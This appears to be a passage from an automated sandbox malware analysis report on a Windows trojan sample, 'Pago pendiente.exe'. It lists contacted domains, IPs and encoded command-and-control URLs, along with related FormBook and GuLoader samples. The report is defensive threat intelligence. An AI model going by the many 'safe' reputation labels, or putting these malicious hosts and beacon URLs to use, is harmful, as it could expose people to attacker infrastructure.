          http://www.wonderdread.cloud0%Avira URL Cloudsafe
          http://www.wonderdread.cloud/gs12/0%Avira URL Cloudsafe
          http://www.udin88b.us/gs12/0%Avira URL Cloudsafe
          http://www.hjgd.xyz/gs12/0%Avira URL Cloudsafe
          http://www.urxetqt.comReferer:0%Avira URL Cloudsafe
          http://www.umastyle.club/gs12/0%Avira URL Cloudsafe
          http://www.zgcple.info0%Avira URL Cloudsafe
          http://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba0%Avira URL Cloudsafe
          http://www.tronbank.club0%Avira URL Cloudsafe
          http://www.urxetqt.com/gs12/100%Avira URL Cloudphishing
          http://www.airzf.com/gs12/0%Avira URL Cloudsafe
          http://www.wonderdread.cloudReferer:0%Avira URL Cloudsafe
          http://www.udin88b.us/gs12/www.eternalknot1008.com0%Avira URL Cloudsafe
          http://www.signomo.com/gs12/0%Avira URL Cloudsafe
          http://www.k2securityhn.com0%Avira URL Cloudsafe
          http://www.sports565.com/gs12/www.lolabeautystudios.com0%Avira URL Cloudsafe
          http://www.actnowgreen.comReferer:0%Avira URL Cloudsafe
          http://www.signomo.com/gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba0%Avira URL Cloudsafe
          http://www.k2securityhn.com/gs12/www.wonderdread.cloud0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.airzf.com
          		154.12.38.29
          		truefalse
            		unknown
            www.udin88b.us
            		154.83.2.141
            		truefalse
              		unknown
              parkingpage.namecheap.com
              		91.195.240.19
              		truefalse
                		high
                www.tronbank.club
                		103.224.212.216
                		truetrue
                  		unknown
                  signomo.com
                  		3.33.130.190
                  		truetrue
                    		unknown
                    k2securityhn.com
                    		3.33.130.190
                    		truetrue
                      		unknown
                      shops.myshopify.com
                      		23.227.38.74
                      		truefalse
                        		unknown
                        www.umastyle.club
                        		103.224.212.210
                        		truefalse
                          		unknown
                          www.actnowgreen.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.zgcple.info
                            		unknown
                            		unknowntrue
                              		unknown
                              www.wonderdread.cloud
                              		unknown
                              		unknowntrue
                                		unknown
                                www.urxetqt.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.signomo.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.k2securityhn.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.eternalknot1008.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.tronbank.club/gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLbatrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.lolabeautystudios.com/gs12/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.k2securityhn.com/gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLbatrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLbafalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.signomo.com/gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLbatrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.sports565.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://word.office.comonexplorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.eternalknot1008.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.signomo.com/gs12/www.urxetqt.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.y2llvq.vip/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.eternalknot1008.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.hjgd.xyzexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.k2securityhn.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.actnowgreen.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://powerpoint.office.comcemberexplorer.exe, 00000006.00000002.4454283275.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2029302609.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/DataSet1.xsdPago pendiente.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.actnowgreen.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.urxetqt.com/gs12/www.hjgd.xyzexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.tronbank.club/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.signomo.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.y2llvq.vipexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.umastyle.clubReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.zgcple.info/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://excel.office.comexplorer.exe, 00000006.00000003.3097001927.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4449891914.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097220261.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.microexplorer.exe, 00000006.00000000.2024943669.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447767327.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447077896.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.51win.ink/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.tronbank.club/gs12/www.signomo.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.51win.inkReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sports565.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.airzf.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.eternalknot1008.com/gs12/www.zgcple.infoexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lolabeautystudios.com/gs12/www.y2llvq.vipexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zgcple.infoReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lolabeautystudios.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.airzf.com/gs12/www.actnowgreen.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.actnowgreen.com/gs12/www.udin88b.usexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hjgd.xyz/gs12/www.airzf.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.y2llvq.vipReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.k2securityhn.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sports565.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000000.2029302609.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.umastyle.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePago pendiente.exe, 00000000.00000002.2008580882.00000000034E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.eternalknot1008.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.airzf.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.y2llvq.vip/gs12/www.51win.inkexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.hjgd.xyzReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://wns.windows.com/)sexplorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.signomo.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.urxetqt.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                http://www.wonderdread.cloud/gs12/www.umastyle.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.udin88b.usexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.51win.inkexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.umastyle.club/gs12/www.sports565.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.51win.ink/gs12/ch_cfexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lolabeautystudios.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lolabeautystudios.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.udin88b.usReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zgcple.info/gs12/www.k2securityhn.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://outlook.comexplorer.exe, 00000006.00000002.4449957042.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.wonderdread.cloud/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.wonderdread.cloudexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000006.00000002.4459657953.000000001136F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.00000000051EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://www.udin88b.us/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.urxetqt.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tronbank.clubReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hjgd.xyz/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.umastyle.club/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zgcple.infoexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tronbank.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.urxetqt.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.wonderdread.cloudReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.airzf.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.udin88b.us/gs12/www.eternalknot1008.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.signomo.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.k2securityhn.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com/explorer.exe, 00000006.00000000.2026275554.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sports565.com/gs12/www.lolabeautystudios.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.actnowgreen.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.vexplorer.exe, 00000006.00000002.4443289671.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.k2securityhn.com/gs12/www.wonderdread.cloudexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        154.12.38.29
                                                        		www.airzf.comUnited States
                                                        		54133UNMETEREDCAfalse
                                                        3.33.130.190
                                                        		signomo.comUnited States
                                                        		8987AMAZONEXPANSIONGBtrue
                                                        103.224.212.216
                                                        		www.tronbank.clubAustralia
                                                        		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue

                                                        General Information

                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1430321
                                                        Start date and time:2024-04-23 14:19:09 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 12m 39s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Sample name:Pago pendiente.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winEXE@11/6@12/3
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 172
                                                        • Number of non-executed functions: 309
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • VT rate limit hit for: Pago pendiente.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        14:19:55API Interceptor1x Sleep call for process: Pago pendiente.exe modified
                                                        14:19:56API Interceptor12x Sleep call for process: powershell.exe modified
                                                        14:19:59API Interceptor8085073x Sleep call for process: explorer.exe modified
                                                        14:20:41API Interceptor7205021x Sleep call for process: control.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3.33.130.190Ordem de Compra.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.clashfitness.com/fs83/?_dnp2=g0Dl2hfPZh6&KtxD=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2p041JRVShddibDw==
                                                        Bank Details.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.alhandco.com/fs83/?GjRhvF6=8rohnvDF5kh+o1NOYRPm2/cn9W3SragyI9glmqEAkYsjGSQIG2JjI1Ywqg+/wlY5v9Rz&Il=X2JX02P0Mnd84pd
                                                        Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                        • www.lunazone.us/m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H
                                                        Ola#U011fan#U00fcst#U00fc #U00f6deme.exeGet hashmaliciousFormBookBrowse
                                                        • www.freefoodpro.com/gs12/?VR-X4=9eJw5ls0sJOkjLnVlwyFSnWFW6kUG96xBpPIo3HMQVuilUjgGvwDzxuS9bT5n/+36fQt9vxZ3A==&LXedb=UfF4Xry
                                                        7pBip8QD2u.exeGet hashmaliciousFormBookBrowse
                                                        • www.8xb799.com/ki21/?Dtx=Ko9jSs5WVFqqq/VgTiR1hm4Th6P16VS6CeAJ/BZkX5NFlELD5JXvS8VenJXixdPNAoDe&blA=Od5t-r3p0
                                                        narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.xn--diseafacil-w9a.com/dd20/?GFQL1=q8DVLSKZmumKeAfNfIEwqgwWoiHwoxutlGocD5zBD9wPsfuE5ife8r9vkXvW1Q745XA6&lf20=sBdp88JXEddd9
                                                        HrONRdSlYf.exeGet hashmaliciousUnknownBrowse
                                                        • thinkboard.net/index.php
                                                        hj3YCvtlg7.exeGet hashmaliciousFormBookBrowse
                                                        • www.ethicai.pro/vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP
                                                        gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                        • www.ariostech.com/fs83/?F0G=4hOdKx&AZ=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVQJQXKev3+LO
                                                        ZNGMn9IDJX.exeGet hashmaliciousFormBookBrowse
                                                        • www.ariostech.com/fs83/?GfFd7pI0=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVT9AHfqpqryJ&Ezu=UXItOX1x-th4
                                                        103.224.212.216CERTIFICATE OF REGISTRY_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.e1fbar.com/oa21/?tXaPZx=XPLXzXIP&1bxXAd=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn
                                                        VIMEKSIM PO# 1330 Confirmation_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.e1fbar.com/oa21/?9rEx=aH40RveXvfWx_dgP&hp0tAn_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn
                                                        Purchase_Order_PA056223.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.e1fbar.com/oa21/?u6al_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn&BR-pk=vVwhfNlhQdJd
                                                        PO#CR21-1178321.exeGet hashmaliciousFormBookBrowse
                                                        • www.biddrivego.com/bp31/?M2Mp=BbjH9j20bVAPFLnP&mzuH8JU=Z5L6swpfWqm+04QiTY4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSEx1RyQK8q6j
                                                        UgHXEfw1uL.exeGet hashmaliciousFormBookBrowse
                                                        • www.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk
                                                        mj0mo2csOj.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                        • www.zg9tywlubmftzw5ldzmzmzk.com/ju29/?XBZ=eJVNysr8g7jhGVJM6WKlDkK99NL0wUK/QDlsL7Lj6NSFlz2tZV6Lob/sU+3h/ZZd2NS5&EhA830=9rMdY83P9Lb
                                                        SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                        • www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q
                                                        Audit_Confirmation_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.subpaylive.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=W9llMiursJsou6ZkRs5LJBT9oyR3M4qDKVATUZCUeHXMX1W+AU0MWBNIglF3FqFvpfwF

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        parkingpage.namecheap.comPO0423024.exeGet hashmaliciousFormBookBrowse
                                                        • 91.195.240.19
                                                        PO0423023.exeGet hashmaliciousFormBookBrowse
                                                        • 91.195.240.19
                                                        INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                        • 91.195.240.19
                                                        Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 91.195.240.19
                                                        NEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 91.195.240.19
